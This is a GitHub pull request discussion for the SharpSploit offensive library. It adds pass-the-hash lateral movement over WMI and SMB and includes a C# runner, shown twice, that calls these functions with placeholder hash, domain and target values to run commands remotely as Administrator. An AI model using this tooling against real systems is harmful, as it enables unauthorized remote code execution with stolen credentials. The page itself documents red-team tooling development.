SharpSploit icon indicating copy to clipboard operation
SharpSploit copied to clipboard
verified publisher icon cobbr

Merge pth into master

Open checkymander opened this issue 5 years ago • 2 comments

Added pass the hash functionality into SharpSploit, WMIExecute and SMBExecute based on the Invoke-TheHash codebase. Code can be tested with the following runner:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using SharpSploit.LateralMovement;

namespace SSRunner
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Testing Pass the Hash with WMIExec");
            Console.WriteLine(PassTheHash.WMIExecute("Administrator", "<hash>", "<domain>", "<target>", command: "", debug:false, AdminCheck:false));


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB2");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>", command: "<command>", ComSpec: false, ForceSMB1: false, debug:true, AdminCheck:false)); ;


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB1");
            Console.WriteLine(PassTheHash.SMBExecute("Administrator", "<hash>", "<domain>", "<target>")); ;

            Console.WriteLine("Finished");
            Console.ReadKey();
        }
    }
}

The library supports both Admin Check functionality, and command execution with support for WMI, SMB1, and SMB2 (including signing).

checkymander avatar Feb 28 '20 04:02 checkymander 

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;

using SharpSploit.LateralMovement;

namespace SSRunner
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Testing Pass the Hash with WMIExec");
            Console.WriteLine(WMI.WMIExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>", command: "", debug:false, AdminCheck:false));


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB2");
            Console.WriteLine(SMB.SMBExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>", command: "<command>", ComSpec: false, ForceSMB1: false, debug:true, AdminCheck:false)); ;


            Console.WriteLine("Testing Pass the Hash with SMBExec SMB1");
            Console.WriteLine(SMB.SMBExecuteWithHash("Administrator", "<hash>", "<domain>", "<target>")); ;

            Console.WriteLine("Finished");
            Console.ReadKey();
        }
    }
}

Updated example code to reference the new function names

checkymander avatar Aug 03 '20 14:08 checkymander

Any chance to get this merged into master? Would love to see this in Covenant in the long run

edermi avatar Apr 07 '21 08:04 edermi